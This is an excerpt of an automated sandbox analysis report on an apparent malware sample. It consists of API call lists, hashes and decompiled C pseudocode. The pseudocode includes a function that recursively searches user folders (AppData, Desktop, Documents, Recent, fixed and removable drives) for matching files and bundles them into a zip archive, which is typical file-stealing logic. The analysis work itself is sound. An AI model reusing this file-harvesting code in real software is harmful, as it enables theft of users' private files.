                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3_InfoSystem
                                                                                • String ID:
                                                                                • API String ID: 2966166590-0
                                                                                • Opcode ID: 5f92554b0ca8216035f6fddf8669359bac445a9e16af64ecc1838f5950a532e5
                                                                                • Instruction ID: 972e73779750022b688189fcf2bfcb24e180123cf60594e3776ea22aa5d8b921
                                                                                • Opcode Fuzzy Hash: 5f92554b0ca8216035f6fddf8669359bac445a9e16af64ecc1838f5950a532e5
                                                                                • Instruction Fuzzy Hash: 86D0A77180010CEBCB00EFA0D489ECD7BB8AB08309F004010F500A3150C774DA59CBA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __encode_pointer.LIBCMT ref: 00C76F87
                                                                                  • Part of subcall function 00C76F13: TlsGetValue.KERNEL32(00000000,?,00C76F8C,00000000,00C7DA1D,00DAD900,00000000,00000314,?,00C76034,00DAD900,Microsoft Visual C++ Runtime Library,00012010), ref: 00C76F25
                                                                                  • Part of subcall function 00C76F13: TlsGetValue.KERNEL32(00000005,?,00C76F8C,00000000,00C7DA1D,00DAD900,00000000,00000314,?,00C76034,00DAD900,Microsoft Visual C++ Runtime Library,00012010), ref: 00C76F3C
                                                                                  • Part of subcall function 00C76F13: RtlEncodePointer.NTDLL(00000000,?,00C76F8C,00000000,00C7DA1D,00DAD900,00000000,00000314,?,00C76034,00DAD900,Microsoft Visual C++ Runtime Library,00012010), ref: 00C76F7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: Value$EncodePointer__encode_pointer
                                                                                • String ID:
                                                                                • API String ID: 2585649348-0
                                                                                • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                • Instruction ID: 3bf1f59774e12fd619a33481815e3280c224340d83fdebebd7109a526416172c
                                                                                • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                • Instruction Fuzzy Hash:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RtlEncodePointer.NTDLL(00000000,0042F472,00449160,00000314,00000000,?,?,?,?,?,00424770,00449160,Microsoft Visual C++ Runtime Library,00012010), ref: 004279B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EncodePointer
                                                                                • String ID:
                                                                                • API String ID: 2118026453-0
                                                                                • Opcode ID: 890bcb0604b07ed1d40f905364f67d67e931464ae62e7d89c780419831222b95
                                                                                • Instruction ID: 45cfde8e58aa55ea41bb1d1a622fc9dd9742d3e9ce5069b4fe2740196e0f3838
                                                                                • Opcode Fuzzy Hash: 890bcb0604b07ed1d40f905364f67d67e931464ae62e7d89c780419831222b95
                                                                                • Instruction Fuzzy Hash:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C672DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLocal
                                                                                • String ID:
                                                                                • API String ID: 3494564517-0
                                                                                • Opcode ID: 04f33de6c8cde3b670c2cf146abdbfef6cad668040cbfadeb1794ec271781cee
                                                                                • Instruction ID: 0ac31e379cbb5504b5113a3d861e699c916368d262e372919146145968a2179c
                                                                                • Opcode Fuzzy Hash: 04f33de6c8cde3b670c2cf146abdbfef6cad668040cbfadeb1794ec271781cee
                                                                                • Instruction Fuzzy Hash: F4E0E56180C248CFC7108A62849ABE67FF0EF4A308F304BC7ED565B262C6204509D752
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C672DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLocal
                                                                                • String ID:
                                                                                • API String ID: 3494564517-0
                                                                                • Opcode ID: 33db89a6cb99ed4e822cd72e41333510c9e552b62c058cbc824f8583fc7b1281
                                                                                • Instruction ID: c490743275e4c69d8f2913ac5fd3e8fcfabaafc096081670fbbf1b1cf7db2c5f
                                                                                • Opcode Fuzzy Hash: 33db89a6cb99ed4e822cd72e41333510c9e552b62c058cbc824f8583fc7b1281
                                                                                • Instruction Fuzzy Hash: 66E0DF6440C288DBC7008A6284C9FE53BE2DF08318B204796DD4A4A662DA304800EB63
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C672DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLocal
                                                                                • String ID:
                                                                                • API String ID: 3494564517-0
                                                                                • Opcode ID: 0ae532b9958a6a93f54eb984a6c1d1a94ec9c6e45b59e9eff8542e293e39080b
                                                                                • Instruction ID: 4ede1786fc789dc39a7d26cbfddb1a43cad94e2e74dadcd7fc015fca5dea8428
                                                                                • Opcode Fuzzy Hash: 0ae532b9958a6a93f54eb984a6c1d1a94ec9c6e45b59e9eff8542e293e39080b
                                                                                • Instruction Fuzzy Hash: 94C02B7248C200FFC32087E28C8BD773865674C78AF304E067503B2291C330080096B3
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 28%
                                                                                			E0040950A(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, int _a32, int _a36) {
                                                                                				signed int _v12;
                                                                                				char _v280;
                                                                                				char _v544;
                                                                                				char _v808;
                                                                                				char _v1072;
                                                                                				char _v1336;
                                                                                				char _v6336;
                                                                                				struct _WIN32_FIND_DATAA _v6656;
                                                                                				intOrPtr _v6660;
                                                                                				char* _v6664;
                                                                                				char _v6668;
                                                                                				void* _v6672;
                                                                                				intOrPtr _v6676;
                                                                                				char _v6680;
                                                                                				char _v6684;
                                                                                				intOrPtr _v6688;
                                                                                				intOrPtr _v6692;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t99;
                                                                                				intOrPtr _t103;
                                                                                				int _t112;
                                                                                				void* _t129;
                                                                                				int _t136;
                                                                                				void* _t149;
                                                                                				char* _t150;
                                                                                				int _t154;
                                                                                				int _t161;
                                                                                				intOrPtr _t175;
                                                                                				int _t177;
                                                                                				char* _t180;
                                                                                				void* _t194;
                                                                                				void* _t201;
                                                                                				CHAR* _t202;
                                                                                				intOrPtr _t203;
                                                                                				signed int _t204;
                                                                                				void* _t205;
                                                                                				void* _t207;
                                                                                				void* _t208;
                                                                                				char* _t209;
                                                                                
                                                                                				_t201 = __edx;
                                                                                				E00430D40(0x1a20);
                                                                                				_t99 =  *0x447674; // 0x4124c941
                                                                                				_v12 = _t99 ^ _t204;
                                                                                				_t196 = _a16;
                                                                                				_v6660 = _a4;
                                                                                				_t203 = _a28;
                                                                                				_v6676 = _a8;
                                                                                				_t103 = _a12;
                                                                                				_v6692 = _t103;
                                                                                				_v6664 = _a16;
                                                                                				_v6688 = _t203;
                                                                                				wsprintfA( &_v1336, "%s\\*", _t103);
                                                                                				_v6672 = FindFirstFileA( &_v1336,  &_v6656);
                                                                                				E00427E30( &_v6336, 0, 0x1388);
                                                                                				_t207 = _t205 + 0x18;
                                                                                				_t112 =  *0x44a1b8( &_v6336, _t203);
                                                                                				if(_v6672 == 0xffffffff) {
                                                                                					L43:
                                                                                					return E0041DEB4(_t112, 0, _v12 ^ _t204, _t201, _t202, _t203);
                                                                                				}
                                                                                				_t202 = "\\";
                                                                                				do {
                                                                                					_push(".");
                                                                                					_push( &(_v6656.cFileName));
                                                                                					if( *0x44a1d8() == 0) {
                                                                                						goto L41;
                                                                                					}
                                                                                					_push("..");
                                                                                					_push( &(_v6656.cFileName));
                                                                                					if( *0x44a1d8() == 0) {
                                                                                						goto L41;
                                                                                					}
                                                                                					 *0x44a220( &_v280, _v6692);
                                                                                					 *0x44a1b8( &_v280, _t202);
                                                                                					 *0x44a1b8( &_v280,  &(_v6656.cFileName));
                                                                                					_t213 = _a36;
                                                                                					if(_a36 != 0) {
                                                                                						L6:
                                                                                						E00427E30( &_v808, 0, 0x104);
                                                                                						_t203 = _v6676;
                                                                                						_t208 = _t207 + 0xc;
                                                                                						_t129 =  *0x44a1d8(_t203, 0x43e028);
                                                                                						_push( &(_v6656.cFileName));
                                                                                						if(_t129 != 0) {
                                                                                							_push(_t203);
                                                                                							wsprintfA( &_v1072, "%s\\%s");
                                                                                							_t207 = _t208 + 0x10;
                                                                                						} else {
                                                                                							wsprintfA( &_v1072, "%s");
                                                                                							_t207 = _t208 + 0xc;
                                                                                						}
                                                                                						if(lstrlenA( &_v6336) <= 3) {
                                                                                							__eflags = _a36;
                                                                                							if(_a36 == 0) {
                                                                                								L35:
                                                                                								_t136 = PathMatchSpecA( &(_v6656.cFileName), _v6664);
                                                                                								__eflags = _t136;
                                                                                								if(_t136 == 0) {
                                                                                									goto L39;
                                                                                								}
                                                                                								_push(_t203);
                                                                                								goto L28;
                                                                                							}
                                                                                							_t154 = PathMatchSpecA( &(_v6656.cFileName), "*.lnk");
                                                                                							__eflags = _t154;
                                                                                							if(_t154 == 0) {
                                                                                								goto L35;
                                                                                							}
                                                                                							 *0x44a1d0(0);
                                                                                							E00409126( &_v280,  &_v808);
                                                                                							_pop(_t196);
                                                                                							 *0x44a1c0();
                                                                                							_t161 = PathMatchSpecA( &_v808, _v6664);
                                                                                							__eflags = _t161;
                                                                                							if(_t161 == 0) {
                                                                                								goto L39;
                                                                                							}
                                                                                							_push(_t203);
                                                                                							goto L23;
                                                                                						} else {
                                                                                							_t175 = E0041F145(0, _t201, _t202,  &_v6336, ":",  &_v6684);
                                                                                							_t207 = _t207 + 0xc;
                                                                                							_t203 = _t175;
                                                                                							_v6680 = 0;
                                                                                							_v6668 = 0;
                                                                                							if(_a36 != 0 && PathMatchSpecA( &(_v6656.cFileName), "*.lnk") != 0) {
                                                                                								_v6668 = 1;
                                                                                								 *0x44a1d0(0);
                                                                                								E00409126( &_v280,  &_v808);
                                                                                								_pop(_t196);
                                                                                								 *0x44a1c0();
                                                                                							}
                                                                                							if(_t203 == 0) {
                                                                                								L20:
                                                                                								_push(_v6664);
                                                                                								if(_v6668 == 0) {
                                                                                									_t177 = PathMatchSpecA( &(_v6656.cFileName));
                                                                                									__eflags = _t177;
                                                                                									if(_t177 == 0) {
                                                                                										goto L39;
                                                                                									}
                                                                                									_push(_v6676);
                                                                                									L28:
                                                                                									 *0x44a220( &_v544);
                                                                                									 *0x44a1b8( &_v544, _t202);
                                                                                									 *0x44a1b8( &_v544,  &(_v6656.cFileName));
                                                                                									_t149 = E00428980(E0041786A(_t196,  &_v280), _t201, 0x3e8, 0);
                                                                                									__eflags = _t149 - _a24;
                                                                                									if(_t149 >= _a24) {
                                                                                										goto L39;
                                                                                									}
                                                                                									_push(2);
                                                                                									_t196 =  &_v280;
                                                                                									_push(0);
                                                                                									__eflags = _a32;
                                                                                									if(_a32 == 0) {
                                                                                										L37:
                                                                                										_t150 =  &_v544;
                                                                                										L38:
                                                                                										_push(_t150);
                                                                                										E0041D315(_v6660);
                                                                                										_t207 = _t207 + 0xc;
                                                                                										goto L39;
                                                                                									}
                                                                                									_t150 =  &_v280;
                                                                                									goto L38;
                                                                                								}
                                                                                								if(PathMatchSpecA( &_v808) == 0) {
                                                                                									goto L39;
                                                                                								}
                                                                                								_push(_v6676);
                                                                                								L23:
                                                                                								 *0x44a220( &_v544);
                                                                                								 *0x44a1b8( &_v544, _t202);
                                                                                								 *0x44a1b8( &_v544, PathFindFileNameA( &_v808));
                                                                                								if(E00428980(E0041786A(_t196,  &_v280), _t201, 0x3e8, 0) >= _a24) {
                                                                                									goto L39;
                                                                                								}
                                                                                								_push(2);
                                                                                								_t196 =  &_v808;
                                                                                								_push(0);
                                                                                								if(_a32 == 0) {
                                                                                									goto L37;
                                                                                								}
                                                                                								_t150 =  &_v808;
                                                                                								goto L38;
                                                                                							} else {
                                                                                								do {
                                                                                									_push(0);
                                                                                									_push(_t203);
                                                                                									_t180 =  &_v808;
                                                                                									if(_v6668 == 0) {
                                                                                										_t180 =  &(_v6656.cFileName);
                                                                                									}
                                                                                									_push(_t180);
                                                                                									if( *0x44a170() != 0) {
                                                                                										_v6680 = 1;
                                                                                									}
                                                                                									_t203 = E0041F145(0, _t201, _t202, 0, ":",  &_v6684);
                                                                                									_t207 = _t207 + 0xc;
                                                                                								} while (_t203 != 0);
                                                                                								if(_v6680 != 0) {
                                                                                									L39:
                                                                                									if(_a20 != 0) {
                                                                                										E0040950A(_t201, _v6660,  &_v1072,  &_v280, _v6664, _a20, _a24, _v6688, _a32, _a36);
                                                                                										_t207 = _t207 + 0x24;
                                                                                									}
                                                                                									goto L41;
                                                                                								}
                                                                                								goto L20;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					_t209 = _t207 - 0x1c;
                                                                                					_t196 = _t209;
                                                                                					_v6668 = _t209;
                                                                                					 *((intOrPtr*)(_t196 + 0x14)) = 0xf;
                                                                                					 *((intOrPtr*)(_t196 + 0x10)) = 0;
                                                                                					 *_t196 = 0;
                                                                                					E0040381A(_t196,  &_v280);
                                                                                					_t194 = E00409245(0, _t196, _t202, _t203, _t213);
                                                                                					_t207 = _t209 + 0x1c;
                                                                                					if(_t194 != 0) {
                                                                                						goto L41;
                                                                                					}
                                                                                					goto L6;
                                                                                					L41:
                                                                                				} while (FindNextFileA(_v6672,  &_v6656) != 0);
                                                                                				_t112 = FindClose(_v6672);
                                                                                				goto L43;
                                                                                			}













































                                                                                0x00409982
                                                                                0x00409990
                                                                                0x00000000

                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 0040955E
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00409575
                                                                                • _memset.LIBCMT ref: 00409590
                                                                                • lstrcat.KERNEL32(?,?), ref: 004095A0
                                                                                • StrCmpCA.SHLWAPI(?,00440CA4), ref: 004095C4
                                                                                • StrCmpCA.SHLWAPI(?,00440CA8), ref: 004095DE
                                                                                • lstrcpy.KERNEL32(?,?), ref: 004095F9
                                                                                • lstrcat.KERNEL32(?,00440C98), ref: 00409607
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040961B
                                                                                • _memset.LIBCMT ref: 00409666
                                                                                • StrCmpCA.SHLWAPI(?,0043E028), ref: 0040967A
                                                                                • wsprintfA.USER32 ref: 00409697
                                                                                • wsprintfA.USER32 ref: 004096A9
                                                                                • lstrlenA.KERNEL32(?), ref: 004096B9
                                                                                • _strtok_s.LIBCMT ref: 004096DB
                                                                                • PathMatchSpecA.SHLWAPI(?,*.lnk), ref: 00409702
                                                                                • CoInitialize.OLE32 ref: 00409717
                                                                                • _strtok_s.LIBCMT ref: 00409774
                                                                                • PathMatchSpecA.SHLWAPI(?,?), ref: 004097A7
                                                                                • lstrcpy.KERNEL32(?,?), ref: 004097C2
                                                                                • lstrcat.KERNEL32(?,00440C98), ref: 004097D0
                                                                                • PathFindFileNameA.SHLWAPI(?), ref: 004097DD
                                                                                  • Part of subcall function 00409245: __EH_prolog3_GS.LIBCMT ref: 0040924C
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00409805
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004097EB
                                                                                  • Part of subcall function 0041786A: CreateFileA.KERNEL32(00409882,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00409882,?), ref: 00417885
                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0040997C
                                                                                • FindClose.KERNEL32(000000FF), ref: 00409990
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$FileFind$Pathwsprintf$MatchSpec_memset_strtok_slstrcpy$CloseCreateFirstH_prolog3_InitializeNameNextUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                • String ID: %s\%s$%s\*$*.lnk
                                                                                • API String ID: 2039857820-1856930566
                                                                                • Opcode ID: c715d0849cbfd78dc485a5ed7cef114537927fbfebd13899c72260d89656cfdd
                                                                                • Instruction ID: ffd5a65dbea6979628a0b3f2831f0eb712396430546a499d59bf8078b44b5aaa
                                                                                • Opcode Fuzzy Hash: c715d0849cbfd78dc485a5ed7cef114537927fbfebd13899c72260d89656cfdd
                                                                                • Instruction Fuzzy Hash: DDC16DB694121CABCF209FA1DC889DA77BCAB09345F0440FAF609F2141D7389E948F5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: ___getlocaleinfo
                                                                                • String ID:
                                                                                • API String ID: 1937885557-0
                                                                                • Opcode ID: d13b5c3e743950fe39b2a30715bba3b8edb0f126fc253a796b476166ec161c68
                                                                                • Instruction ID: e5b7519e40994130e68474c1778b5d372f743d89950e1e317f7f66a1496f7485
                                                                                • Opcode Fuzzy Hash: d13b5c3e743950fe39b2a30715bba3b8edb0f126fc253a796b476166ec161c68
                                                                                • Instruction Fuzzy Hash: 40E1DEF294021DBEEB11DAF1CC81EFF77BDEF14744F04492AB21AD2081EA70AA159760
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 29%
                                                                                			E004099F2(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                				signed int _v8;
                                                                                				char _v276;
                                                                                				char _v540;
                                                                                				char _v644;
                                                                                				char _v908;
                                                                                				intOrPtr _v912;
                                                                                				intOrPtr* _v916;
                                                                                				intOrPtr _v920;
                                                                                				intOrPtr _v924;
                                                                                				intOrPtr _v928;
                                                                                				intOrPtr _v932;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t69;
                                                                                				void* _t86;
                                                                                				void* _t123;
                                                                                				signed int _t130;
                                                                                				signed int _t132;
                                                                                				void* _t133;
                                                                                				int _t137;
                                                                                				void* _t142;
                                                                                				void* _t176;
                                                                                				void* _t181;
                                                                                				void* _t182;
                                                                                				void* _t183;
                                                                                				signed int _t187;
                                                                                				intOrPtr* _t188;
                                                                                				signed int _t190;
                                                                                				void* _t191;
                                                                                				void* _t195;
                                                                                				void* _t197;
                                                                                
                                                                                				_t197 = __eflags;
                                                                                				_t182 = __edx;
                                                                                				_t69 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t69 ^ _t190;
                                                                                				_v928 = _a8;
                                                                                				_v924 = _a12;
                                                                                				_t189 = 0x104;
                                                                                				_v920 = _a20;
                                                                                				_t183 = __ecx;
                                                                                				E00427E30( &_v908, 0, 0x104);
                                                                                				E00427E30( &_v276, 0, 0x104);
                                                                                				E00427E30( &_v540, 0, 0x104);
                                                                                				 *0x44a1b8( &_v908, _t183);
                                                                                				 *0x44a1b8( &_v908, ".zip");
                                                                                				_v916 = E0041D251(0, 0, 0x104, _t197);
                                                                                				_v912 = 0;
                                                                                				_v932 = 0;
                                                                                				_t86 = E00417B72(0, 0, 0x104, 0x1a);
                                                                                				_t195 = _t191 + 0x30;
                                                                                				 *0x44a220( &_v276, E004171D3(_v928, "%APPDATA%"), _t86,  &_v908, 2);
                                                                                				 *0x44a220( &_v276, E004171D3( &_v276, "%LOCALAPPDATA%"), E00417B72(0, 0, 0x104, 0x1c));
                                                                                				 *0x44a220( &_v276, E004171D3( &_v276, "%USERPROFILE%"), E00417B72(0, 0, _t189, 0x28));
                                                                                				 *0x44a220( &_v276, E004171D3( &_v276, "%DESKTOP%"), E00417B72(0, 0, _t189, 0x10));
                                                                                				 *0x44a220( &_v276, E004171D3( &_v276, "%DOCUMENTS%"), E00417B72(0, 0, _t189, 5));
                                                                                				 *0x44a220( &_v276, E004171D3( &_v276, "%PROGRAMFILES%"), E00417B72(0, 0, _t189, 0x26));
                                                                                				 *0x44a220( &_v276, E004171D3( &_v276, "%PROGRAMFILES_86%"), E00417B72(0, 0, _t189, 0x2a));
                                                                                				_push(E00417B72(0, 0, _t189, 8));
                                                                                				_t123 = E004171D3( &_v276, "%RECENT%");
                                                                                				_pop(_t176);
                                                                                				 *0x44a220( &_v276, _t123);
                                                                                				_push(0);
                                                                                				_push("*%DRIVE_FIXED%*");
                                                                                				_push( &_v276);
                                                                                				if( *0x44a170() != 0) {
                                                                                					_v912 = 1;
                                                                                				}
                                                                                				_push(0);
                                                                                				_push("*%DRIVE_REMOVABLE%*");
                                                                                				_push( &_v276);
                                                                                				if( *0x44a170() != 0) {
                                                                                					_v912 = 1;
                                                                                					_v932 = 1;
                                                                                				}
                                                                                				_t130 =  *0x44a170(_v928, "*%RECENT%*", 0);
                                                                                				asm("sbb edi, edi");
                                                                                				_t187 =  ~( ~_t130);
                                                                                				if(_v912 == 0) {
                                                                                					_t132 = E004099A5(0, _t176, _t187, __eflags, _v924,  &_v276, _v916, _a16, _a4, _v920, 0, _t187);
                                                                                				} else {
                                                                                					_t132 = GetLogicalDriveStringsA(0x64,  &_v644);
                                                                                					_t189 =  &_v644;
                                                                                					if(_v644 != 0) {
                                                                                						do {
                                                                                							_t137 = GetDriveTypeA(_t189);
                                                                                							if(_v932 == 0) {
                                                                                								L9:
                                                                                								 *0x44a220( &_v540,  &_v276);
                                                                                								_push(_t189);
                                                                                								_push("%DRIVE_FIXED%");
                                                                                							} else {
                                                                                								_t204 = _t137 - 2;
                                                                                								if(_t137 != 2) {
                                                                                									goto L9;
                                                                                								} else {
                                                                                									 *0x44a220( &_v540,  &_v276);
                                                                                									_push(_t189);
                                                                                									_push("%DRIVE_REMOVABLE%");
                                                                                								}
                                                                                							}
                                                                                							_t142 = E004171D3( &_v540);
                                                                                							_pop(_t181);
                                                                                							 *0x44a220( &_v540, _t142);
                                                                                							E004099A5(0, _t181, _t187, _t204, _v924,  &_v540, _v916, _a16, _a4, _v920, _v912, _t187);
                                                                                							_t195 = _t195 + 0x20;
                                                                                							_t132 = lstrlenA(_t189);
                                                                                							_t189 =  &(_t189[_t132 + 1]);
                                                                                						} while ( *_t189 != 0);
                                                                                					}
                                                                                				}
                                                                                				_t188 = _v916;
                                                                                				if(_t188 == 0 || (_t132 & 0xffffff00 |  *_t188 == 0x00000001) == 0) {
                                                                                					_t133 = E0041D357(_t188);
                                                                                				} else {
                                                                                					_t133 = E00407C94(_t189, _t188);
                                                                                				}
                                                                                				return E0041DEB4(_t133, 0, _v8 ^ _t190, _t182, _t188, _t189);
                                                                                			}

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00409A35
                                                                                • _memset.LIBCMT ref: 00409A46
                                                                                • _memset.LIBCMT ref: 00409A57
                                                                                • lstrcat.KERNEL32(?), ref: 00409A67
                                                                                • lstrcat.KERNEL32(?,.zip), ref: 00409A79
                                                                                  • Part of subcall function 0041D251: __EH_prolog3.LIBCMT ref: 0041D258
                                                                                  • Part of subcall function 00417B72: _memset.LIBCMT ref: 00417B93
                                                                                  • Part of subcall function 00417B72: SHGetFolderPathA.SHELL32(00000000,00000002,00000000,00000000,?), ref: 00417BAB
                                                                                  • Part of subcall function 004171D3: StrStrA.SHLWAPI(?,00409ABC,00000104,00000000,00409ABC,%APPDATA%,00000000), ref: 004171DC
                                                                                  • Part of subcall function 004171D3: lstrcpynA.KERNEL32(0044A450,?,00000000,00000000), ref: 004171F5
                                                                                  • Part of subcall function 004171D3: wsprintfA.USER32 ref: 00417221
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409AC6
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409AEF
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409B18
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409B41
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409B6A
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409B93
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409BBC
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409BE5
                                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00409C61
                                                                                • GetDriveTypeA.KERNEL32(?), ref: 00409C7A
